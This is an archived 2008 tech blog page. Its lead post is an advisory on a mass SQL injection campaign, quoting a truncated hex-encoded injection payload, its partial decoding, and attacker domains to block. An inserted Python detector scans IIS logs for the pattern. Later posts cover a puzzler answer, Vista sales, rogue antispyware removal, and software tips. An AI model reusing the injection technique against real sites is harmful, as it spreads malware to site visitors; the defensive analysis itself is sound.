
April 25th, 2008


Mass SQL injections

Earlier this week I published a post regarding a vulnerability in several versions of Microsoft Windows… Well, the vulnerability is now being exploited: there is another round of mass SQL injections going on, which has infected hundreds of thousands of websites running on the IIS platform.

Performing a simple Google search for traces of the malicious script returns over 510,000 modified pages.

With more and more websites using a SQL back-end to make them faster and more dynamic, it is crucial to verify what information gets stored in or requested from those databases, especially if you allow users to upload content themselves, which happens all the time in discussion forums, blogs, feedback forms etc. Unless that data is sanitized before it gets saved, you can’t control what the website will show to its users. This is what SQL injection is all about: exploiting weaknesses in these controls.

Currently the malicious file being injected is 1.js; however, it must be noted that this could change at any stage. Visitors to this website are “treated” to 8 different exploits for many Windows-based applications including AIM, RealPlayer, and iTunes. DO NOT visit sites that link to this site, as you are very likely to get infected. Trend Micro named the malware toj_agent.KAQ; it watches for passwords and passes them back to the controller’s IP.

In this case the injection code starts off like this (note, this is not the complete code):

   DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
   4C00410052004500200040005400200076006100720063006800610072
   00280032003500350029002C0040004300200076006100720063006800
   610072002800320035003500290020004400450043004C004100520045
   0020005400610062006C0065005F0043007500720073006F0072002000
   43005500520053004F005200200046004F0052002000730065006C0065
   0063007400200061002E006E0061006D0065002C0062002E006E006100
   6D0065002000660072006F006D0020007300790073006F0062006A0065
   00630074007300200061002C0073007900730063006F006C0075006D00
   6E00730020006200200077006800650072006500200061002E00690064
   003D0062002E0069006400200061006E006400200061002E0078007400
   7900700065003D00270075002700200061006E0064002000280062002E
   00780074007900700065003D003900390020006F007200200062002E00
   780074007900700065003D003300350020006…

Which when decoded becomes:

   DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor
   CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b
   where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
   or b…

What happens as a result? It finds all text fields in the database and adds a link to the malicious JavaScript to each and every one of them, so your website displays that link automatically wherever those fields are shown. Essentially, the attackers looked for ASP or ASPX pages containing any type of querystring parameter (a dynamic value such as an article ID, product ID, et cetera) and tried to use it to upload their SQL injection code.
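The request fragment quoted above leaves a recognisable trace in IIS logs. The following Python sketch is an added example, not code from the original post or from F-Secure: it looks for the `DECLARE … CAST(0x…` pattern in the `cs-uri-query` field of a W3C-format log and decodes the hex literal as UTF-16LE, which is how the decoded text above is obtained. The log lines, page names and IP addresses are constructed, and the sample payload is only the decoded prefix shown above.

```python
import re
from urllib.parse import unquote

# Hex literal handed to CAST(), as in the request fragment quoted above.
CAST_HEX = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)
DECLARE_VAR = re.compile(r"DECLARE\s+@\w+\s+N?VARCHAR", re.IGNORECASE)

def decode_hex_literal(hex_text):
    """Decode a SQL Server hex literal as UTF-16LE (NVARCHAR) text."""
    usable = len(hex_text) - len(hex_text) % 4  # keep whole 2-byte code units
    return bytes.fromhex(hex_text[:usable]).decode("utf-16-le", errors="replace")

def scan_iis_log(lines):
    """Return (client_ip, uri_stem, decoded_sql) for each suspicious request."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows below
            continue
        if line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        query = unquote(row.get("cs-uri-query", ""))   # %20 -> space, etc.
        match = CAST_HEX.search(query)
        if match and DECLARE_VAR.search(query):
            hits.append((row.get("c-ip"), row.get("cs-uri-stem"),
                         decode_hex_literal(match.group(1))))
    return hits

# Constructed sample: the payload is only the decoded prefix shown on the page,
# re-encoded the way the request carries it; IPs are documentation addresses.
PREFIX = "DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR"
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2008-04-25 10:01:02 198.51.100.7 GET /article.asp id=42 200",
    "2008-04-25 10:01:09 203.0.113.5 GET /article.asp "
    "id=42;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    + PREFIX.encode("utf-16-le").hex().upper() + " 200",
    "2008-04-25 10:02:00 198.51.100.7 GET /search.asp q=cast%20iron%20pan 200",
]

if __name__ == "__main__":
    for ip, stem, sql in scan_iis_log(SAMPLE_LOG):
        print(ip, stem, sql)
```

A hit identifies the page and parameter that accepted the request, which is where input handling needs to be reviewed.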

So far three different domains have been used to host the malicious content: nmidahena.com, aspder.com and nihaorr1.com. A set of files gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains is inaccessible, but that could change. So if you’re a firewall administrator, we recommend that you block access to them.

I would recommend that Administrators block access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.

Info sourced from F-Secure

Written by Patrick S on April 25th, 2008 with no comments.

My Answer to “Microsoft Advanced Windows Debugging and Troubleshooting” Puzzler 3

Note: this content originally from http://mygreenpaste.blogspot.com. If you are reading it from some other site, please take the time to visit My Green Paste, Inc. Thank you.

Previously, I had written about the puzzlers on the NTDebugging / Microsoft Advanced Windows Debugging and Troubleshooting blog - specifically, the most recent puzzler which involved reverse engineering some assembler. The answer was posted today - there were a lot of responses, and a lot of correct responses.

I had posted the hashes for my answer (which was correct), that I am now able to disclose...

   #include <string.h>

   /* Bubble sort: orders the characters of param1 ascending, in place. */
   void myfun( char* param1 )
   {
       size_t local1 = strlen( param1 );
       for( int local2 = local1; local2 > 0; local2-- )
       {
           /* One pass: swap adjacent characters that are out of order. */
           for( int local3 = 0; local3 < local2 - 1; local3++ )
           {
               if( *(param1+local3) > *(param1+local3+1) )
               {
                   char local4 = *(param1+local3);
                   *(param1+local3) = *(param1+local3+1);
                   *(param1+local3+1) = local4;
               }
           }
       }
   }

Written by «/\/\Ø|ö±ò\/»®© on April 25th, 2008 with no comments.

Microsoft says 140M Vista licenses sold

Microsoft Corp. said Thursday that it has sold 140 million licenses of Windows Vista.
Colleen Healy, general manager of investor relations, made the statement during a conference call with Wall Street analysts after Microsoft posted its third-quarter earnings. The company pointed to strong PC sales for helping the much-maligned operating system achieve that number.
However, revenue from Microsoft's client division, which overwhelmingly comes from sales of Windows Vista or XP licenses, was down 24% from last year's third quarter to $4.03 billion. Chris Liddell, Microsoft's chief financial officer, attributed the decrease to strong sales a year ago immediately after Vista's launch, plus increased software piracy in developing countries and other reasons.
View Full Article: Computerworld

Written by Ankur Mittal on April 25th, 2008 with no comments.

Awola Antispyware 6.0 (Awola) Removal Instructions

Awola Antispyware 6.0 Descriptions:

Awola Antispyware 6.0, or simply Awola, is the latest counterfeit anti-spyware software that endangers the world of computers. Awola Antispyware usually installs itself onto your PC without your permission, through the Vundo Trojan, a virus or fake software. Awola Antispyware will display fake system alerts or fake security alerts to trick users into buying the paid version of Awola Antispyware in order to remove the potential and reported problems. Not only does it cause your machine to slow down dramatically, it also puts your privacy and data at risk.

Download SpyHunter* Spyware Detection Utility.

Manual Removal Instructions:

Stop Awola Antispyware Processes:
Awola.exe

Find and Delete these Awola Antispyware Files:
Awola.exe
Awola001.bas
Awola Anti-Spyware 6.0.lnk

Remove Awola Antispyware Registry Values:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Awola Antispyware
HKEY_LOCAL_MACHINE\SOFTWARE\Awola Antispyware.com


You can also download the free version of Avira Antivir to remove the spyware (update)

Written by admin on April 25th, 2008 with 3 comments.

Outlook 2007: Minimize to System Tray

 

Free up room on your Task Bar by minimizing your Outlook to the System Tray.

1. Right-click on the Outlook icon in the Notification Area, next to the clock.
2. In the resulting menu, select Hide When Minimized

Outlook 2007: Minimize to System Tray - Tech-Recipes.com

Written by computerboom on April 25th, 2008 with no comments.

Foxit Software

 

Foxit Reader 2.3 for Windows

What’s new in Version 2.3?

The following is a list of exciting improvements introduced in Foxit Reader 2.3.

New features:

  • Bookmark Design: Makes it possible to have your own bookmarks. Users can create, edit, or delete bookmarks in a PDF file if the security settings allow.
  • Multi-tab Browsing: Enables users to open multiple files in a single instance. You can choose to view PDFs in a multi-tab window or multiple instances by setting documents layout from the Preferences dialog.
  • Multimedia Player Support: Supports many media formats including audio and video. Read multimedia ebooks with Foxit Reader 2.3.
  • Callout and Text box Tool: Creates comments in a callout text box or a box. You can also define their appearance as other commenting tools.
  • Commenting Text Tool: Enables users to add most types of text edits by right-clicking on the selected text, including highlight, strikeout, underline, squiggly and replacement. You can also use the Commenting Text Tool to add bookmarks for PDF files.
  • Rulers and Guides: Provides horizontal and vertical ruler guides to help users align and position objects on the page. Right-clicking on the ruler enables you to change the unit of measurement.
  • Magnifier: Magnifies areas of the PDF files easily as you work on Foxit Reader.
  • Automatic Scrolling: Allows users to view documents without using mouse actions or keystrokes.
  • OCG Support: Enables the user to view related content stored in a variable number of separate layers.
  • FDF Related: Opens FDF files directly with Foxit Reader without any import implementations.

Enhanced features:

  • Optimized Rendering: Supports progressive rendering and significantly reduces the response time from the user interface events.
  • Improved Link Tools: Allows users to add actions to links, such as go to a page view, open or execute a file, open a web link, etc.
  • Improved Snapshot: Enables users to print the selected area in Foxit Reader by simply selecting the Print option from the context menu.
  • Search Enhancement: Allows users to float, move and resize the Full Foxit Search box.
  • Better Annotation control: Groups drawing markups to help users operate objects collectively, and allows users to move annotations through pages.
  • Font Information: Lists the fonts and the font types used in the original document in the Properties dialog.
  • Updated Command Line: Allows users to open password protected PDF documents with a simple command prompt.
  • Streamlined UI: A completely redesigned UI with a new look and feel makes Foxit Reader more intuitive than ever before.
  • Many bug fixes.

Download: http://www.foxitsoftware.com/downloads/

Written by computerboom on April 25th, 2008 with no comments.